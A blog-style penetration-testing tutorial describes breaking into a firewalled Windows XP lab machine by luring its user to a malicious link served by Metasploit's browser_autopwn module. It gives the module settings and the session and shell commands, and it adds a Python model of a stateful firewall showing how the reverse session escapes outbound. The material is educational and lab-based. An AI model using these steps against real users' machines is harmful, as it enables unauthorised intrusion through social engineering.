How to hack into a firewalled system
LEGAL DISCLAIMER: This "hack" has been performed by using virtual machines running on my own computer, don't use it against other people's systems, unless you've been given explicit written permission by their owners. I'm not responsible for any unintended use of these instructions.
Pentesters have to find a way to break into a system.
Most beginner-level tutorials start by exploiting a system that has been configured to be deliberately vulnerable, with the firewall disabled and a series of open ports.
I don't like playing too easy, so I looked for a way to exploit a firewalled system.
For my purposes I used a Windows XP SP3 victim virtual machine and an attacking Kali Linux virtual machine.
An nmap scan of the victim system revealed no open ports.
However, I could still find a way in by using a Metasploit browser-exploitation module, auxiliary/server/browser_autopwn.
Once the victim clicks a malicious link, this module tries a series of browser exploits, one after another, until one succeeds.
In my case, I had to set up the options for this module as follows (to set an option, use the set command with the syntax set PARAMETER VALUE, e.g. set LHOST 192.168.2.12):
LHOST: IP of the Kali Linux machine
SRVPORT: 80 (the malicious page is served on port 80. The default is port 8080, which is used by numerous proxy servers, but it was ineffective in this case).
URIPATH: / (this setting prevents the module from generating a random URL path).
Enter show options to make sure your parameters are correct.
NOTE: You might have to install Java on the victim machine for the exploit to succeed. The actual process took considerably longer than shown in the video, which is sped up and shortened.
After a while, if the exploit is successful, you should see a message meterpreter session x opened, where x is a variable number (see figure below):
This means we managed to hack into the victim machine.
In my case the session ID was 1. You can therefore interact with the victim machine by opening a session on it with the command sessions -i sessionid (in my case sessions -i 1, where -i means interact with the given session).
To prove we're actually in, we can enter the shell command, which opens a command shell on the victim machine.
The only problem left is how to gain administrative privileges, because the Windows account we compromised is a limited user, but I'll deal with that in a coming post.
This post reaffirms that having a firewall is good and necessary, but it does not by itself guarantee the security of your network: the firewall blocked every inbound connection, yet a connection the victim's own browser opened carried the exploit in, and the reverse session went out the same way.
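As an added illustration of this point (example code, not from the original post), here is a small model of a stateful host firewall: inbound connection attempts are dropped, so nmap sees nothing, yet a connection the victim's browser opens itself, and the reverse session that follows, go straight through; the addresses, the callback port and the egress rule are constructed assumptions.

```python
# Added example (not from the original post): a stateful-firewall model showing why a host with no
# open ports is still reachable through its own browser, and what a simple egress rule changes.
from dataclasses import dataclass, field
from typing import Optional, Set, Tuple

Flow = Tuple[str, int, str, int]

@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False  # True for the first packet of a new TCP connection

@dataclass
class StatefulFirewall:
    protected: str                                   # IP of the host the firewall guards
    egress_ports: Optional[Set[int]] = None          # None = any outbound port allowed
    flows: Set[Flow] = field(default_factory=set)    # connections the host opened itself

    def allow(self, p: Packet) -> bool:
        if p.src == self.protected:                  # outbound packet
            if p.syn:
                if self.egress_ports is not None and p.dport not in self.egress_ports:
                    return False                     # egress policy blocks the new connection
                self.flows.add((p.src, p.sport, p.dst, p.dport))
                return True
            return (p.src, p.sport, p.dst, p.dport) in self.flows
        if p.syn:
            return False                             # inbound: no listening port is exposed
        return (p.dst, p.dport, p.src, p.sport) in self.flows  # reply to a flow the host opened

VICTIM, ATTACKER = "10.0.0.5", "10.0.0.9"           # constructed addresses

def replay(fw: StatefulFirewall) -> dict:
    """Replay the post's sequence of events and record what the firewall lets through."""
    return {
        "port_scan_probe": fw.allow(Packet(ATTACKER, 40000, VICTIM, 445, syn=True)),
        "victim_clicks_link": fw.allow(Packet(VICTIM, 50123, ATTACKER, 80, syn=True)),  # SRVPORT 80
        "exploit_page_reply": fw.allow(Packet(ATTACKER, 80, VICTIM, 50123)),
        # reverse session back to LHOST; port 4444 is an assumed placeholder, the post gives none
        "reverse_session": fw.allow(Packet(VICTIM, 50124, ATTACKER, 4444, syn=True)),
    }

def post_scenario() -> dict:
    return replay(StatefulFirewall(VICTIM))          # the post's setup: outbound unrestricted

def with_egress_policy() -> dict:
    return replay(StatefulFirewall(VICTIM, egress_ports={80, 443}))  # only web ports outbound
```

The egress rule stops only the callback on a non-web port; the exploit page itself still arrives over port 80, which is why keeping the browser and its plug-ins (such as the Java mentioned in the NOTE above) patched is the other half of the defence.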
Thanks for your time.